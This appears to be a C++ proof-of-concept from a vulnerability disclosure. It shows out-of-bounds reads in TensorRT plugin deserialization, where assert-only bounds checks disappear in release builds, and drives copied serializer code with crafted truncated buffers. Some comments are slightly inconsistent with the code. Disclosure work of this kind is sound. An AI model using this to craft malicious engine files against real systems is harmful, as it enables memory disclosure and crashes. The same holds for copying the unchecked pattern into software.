File size: 10,284 Bytes
e00c466 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 | /*
* PoC: Out-of-bounds heap read in TensorRT plugin deserialization
*
* Vulnerability: TensorRT's serialize.hpp uses assert()-only bounds checking,
* which is compiled out in release builds (NDEBUG defined). The read<T>()
* function in plugin.h has ZERO bounds checking. When a malicious TensorRT
* engine file (.trt/.engine/.plan) contains a plugin with truncated or
* crafted serialization data, the deserialization reads past the buffer
* boundary.
*
* This PoC demonstrates two bugs:
*
* 1. serialize.hpp vector deserialization (line 101-112):
* - Reads attacker-controlled `size` from buffer
* - Resizes vector to `size`
* - Computes nbyte = size * sizeof(T) (can overflow)
* - assert(*buffer_size >= nbyte) β NO-OP in release
* - memcpy from buffer with no bounds check
*
* 2. serialize.hpp string deserialization (line 128-138):
* - Reads attacker-controlled `nbyte` from buffer
* - Resizes string to nbyte
* - assert(*buffer_size >= nbyte) β NO-OP in release
* - memcpy from buffer with no bounds check
*
* Affected code:
* - TensorRT/plugin/common/serialize.hpp:55-61 (POD deserialize)
* - TensorRT/plugin/common/serialize.hpp:101-112 (vector deserialize)
* - TensorRT/plugin/common/serialize.hpp:128-138 (string deserialize)
* - TensorRT/plugin/common/plugin.h:100-108 (read<T>() β zero checks)
*
* All 30+ TensorRT plugins that use these primitives are affected.
*
* Build and run:
* # Debug (assert enabled β catches the bug):
* g++ -fsanitize=address -g -o poc_debug poc_tensorrt_serialize.cpp
* ./poc_debug
*
* # Release (assert disabled β ASAN catches OOB read):
* g++ -fsanitize=address -g -DNDEBUG -o poc_release poc_tensorrt_serialize.cpp
* ./poc_release
*/
#include <cassert>
#include <cstring>
#include <iostream>
#include <string>
#include <type_traits>
#include <vector>
// ============================================================================
// Copied verbatim from TensorRT/plugin/common/serialize.hpp
// ============================================================================
template <typename T>
inline void serialize_value(void** buffer, T const& value);
template <typename T>
inline void deserialize_value(void const** buffer, size_t* buffer_size, T* value);
namespace
{
template <typename T, class Enable = void>
struct Serializer
{
};
// POD serializer β assert-only bounds check
template <typename T>
struct Serializer<T, typename std::enable_if_t<std::is_arithmetic_v<T> || std::is_enum_v<T>>>
{
static size_t serialized_size(T const&)
{
return sizeof(T);
}
static void serialize(void** buffer, T const& value)
{
::memcpy(*buffer, &value, sizeof(T));
reinterpret_cast<char*&>(*buffer) += sizeof(T);
}
static void deserialize(void const** buffer, size_t* buffer_size, T* value)
{
assert(*buffer_size >= sizeof(T)); // NO-OP when NDEBUG is defined!
::memcpy(value, *buffer, sizeof(T));
reinterpret_cast<char const*&>(*buffer) += sizeof(T);
*buffer_size -= sizeof(T);
}
};
// Vector serializer β assert-only bounds check + potential integer overflow
template <typename T>
struct Serializer<std::vector<T>,
typename std::enable_if_t<std::is_arithmetic_v<T> || std::is_enum_v<T>>>
{
static size_t serialized_size(std::vector<T> const& value)
{
return sizeof(value.size()) + value.size() * sizeof(T);
}
static void serialize(void** buffer, std::vector<T> const& value)
{
serialize_value(buffer, value.size());
size_t nbyte = value.size() * sizeof(T);
::memcpy(*buffer, value.data(), nbyte);
reinterpret_cast<char*&>(*buffer) += nbyte;
}
static void deserialize(void const** buffer, size_t* buffer_size, std::vector<T>* value)
{
size_t size;
deserialize_value(buffer, buffer_size, &size);
value->resize(size);
size_t nbyte = value->size() * sizeof(T);
assert(*buffer_size >= nbyte); // NO-OP when NDEBUG is defined!
::memcpy(value->data(), *buffer, nbyte);
reinterpret_cast<char const*&>(*buffer) += nbyte;
*buffer_size -= nbyte;
}
};
// String serializer β assert-only bounds check
template <>
struct Serializer<std::string>
{
static size_t serialized_size(std::string const& value)
{
return sizeof(value.size()) + value.size();
}
static void serialize(void** buffer, std::string const& value)
{
size_t nbyte = value.size();
serialize_value(buffer, nbyte);
::memcpy(*buffer, value.data(), nbyte);
reinterpret_cast<char*&>(*buffer) += nbyte;
}
static void deserialize(void const** buffer, size_t* buffer_size, std::string* value)
{
size_t nbyte;
deserialize_value(buffer, buffer_size, &nbyte);
value->resize(nbyte);
assert(value->size() == nbyte);
assert(*buffer_size >= nbyte); // NO-OP when NDEBUG is defined!
::memcpy(const_cast<char*>(value->data()), *buffer, nbyte);
reinterpret_cast<char const*&>(*buffer) += nbyte;
*buffer_size -= nbyte;
}
};
} // namespace
template <typename T>
inline void serialize_value(void** buffer, T const& value)
{
Serializer<T>::serialize(buffer, value);
}
template <typename T>
inline void deserialize_value(void const** buffer, size_t* buffer_size, T* value)
{
Serializer<T>::deserialize(buffer, buffer_size, value);
}
// ============================================================================
// Copied verbatim from TensorRT/plugin/common/plugin.h
// ============================================================================
template <typename OutType, typename BufferType>
OutType read(BufferType const*& buffer)
{
static_assert(sizeof(BufferType) == 1, "BufferType must be a 1 byte type.");
OutType val{};
std::memcpy(&val, static_cast<void const*>(buffer), sizeof(OutType));
buffer += sizeof(OutType);
return val;
}
// ============================================================================
// PoC: Simulate deserializing a malicious plugin from a truncated buffer
// ============================================================================
// Simulates the FlattenConcat plugin deserialization pattern (flattenConcat.cpp:59-78)
// with a truncated/malicious buffer
void poc_read_oob()
{
std::cout << "\n=== PoC 1: read<T>() OOB read (plugin.h pattern) ===" << std::endl;
std::cout << "Simulating FlattenConcat plugin deserialization with truncated buffer\n" << std::endl;
// Create a tiny buffer (only 16 bytes) but pretend it's a full plugin serialization
// A real FlattenConcat expects: bool + int32 + int32 + int32 + (mNumInputs * int32) + ...
// We provide only 16 bytes, but set mNumInputs to 1000
char buffer[16];
memset(buffer, 0x41, sizeof(buffer)); // Fill with 'A' for visibility
// Write mIgnoreBatch (bool), mConcatAxisID (int32=1), mOutputConcatAxis (int32),
// then mNumInputs = 1000 (attacker-controlled)
char* wp = buffer;
*reinterpret_cast<bool*>(wp) = false; wp += sizeof(bool);
*reinterpret_cast<int32_t*>(wp) = 1; wp += sizeof(int32_t); // mConcatAxisID
*reinterpret_cast<int32_t*>(wp) = 0; wp += sizeof(int32_t); // mOutputConcatAxis
// Remaining 3 bytes not enough for mNumInputs β read<int32_t> will read OOB
char const* d = buffer;
// These reads will go past the 16-byte buffer:
bool ignoreBatch = read<bool>(d);
int32_t concatAxisID = read<int32_t>(d);
int32_t outputConcatAxis = read<int32_t>(d);
int32_t numInputs = read<int32_t>(d); // reads last 4 bytes β still in bounds barely
std::cout << "ignoreBatch=" << ignoreBatch << " concatAxisID=" << concatAxisID
<< " outputConcatAxis=" << outputConcatAxis << " numInputs=" << numInputs << std::endl;
// This read goes PAST the buffer β OOB read!
std::cout << "Next read goes OOB..." << std::endl;
int32_t oob_value = read<int32_t>(d); // <-- HEAP BUFFER OVERFLOW READ
std::cout << "OOB read value: " << oob_value << std::endl;
}
// Demonstrates the string deserialization with crafted length
void poc_string_deserialize_oob()
{
std::cout << "\n=== PoC 2: String deserialization OOB (serialize.hpp) ===" << std::endl;
// Create a buffer with: size_t length = 4096, but only 8 bytes of actual string data
// In release builds (NDEBUG), the assert is removed and memcpy reads 4096 bytes
// from a buffer that only has 8 bytes remaining
const size_t fake_length = 256; // claim string is 256 bytes
const size_t actual_data = 8; // but only provide 8 bytes after the length field
size_t total_buf_size = sizeof(size_t) + actual_data;
char* buffer = new char[total_buf_size];
memcpy(buffer, &fake_length, sizeof(size_t)); // write the fake length
memset(buffer + sizeof(size_t), 'B', actual_data); // write 8 bytes of data
void const* ptr = buffer;
size_t remaining = total_buf_size;
std::string result;
#ifdef NDEBUG
std::cout << "NDEBUG defined β assert() is disabled, OOB read will occur" << std::endl;
#else
std::cout << "NDEBUG not defined β assert() will catch the bug (this is expected in debug)" << std::endl;
std::cout << "Recompile with -DNDEBUG to see the OOB read" << std::endl;
#endif
// This will:
// 1. Read size_t fake_length (256) from buffer
// 2. Resize string to 256
// 3. assert(remaining >= 256) β NO-OP in release!
// 4. memcpy 256 bytes from buffer that only has 8 bytes β OOB READ
deserialize_value(&ptr, &remaining, &result);
std::cout << "String length: " << result.size() << std::endl;
std::cout << "First 8 chars: " << result.substr(0, 8) << std::endl;
delete[] buffer;
}
int main()
{
std::cout << "TensorRT Plugin Deserialization PoC" << std::endl;
std::cout << "====================================" << std::endl;
#ifdef NDEBUG
std::cout << "Build mode: RELEASE (NDEBUG defined β assert() disabled)" << std::endl;
#else
std::cout << "Build mode: DEBUG (assert() enabled)" << std::endl;
#endif
poc_read_oob();
poc_string_deserialize_oob();
return 0;
}
|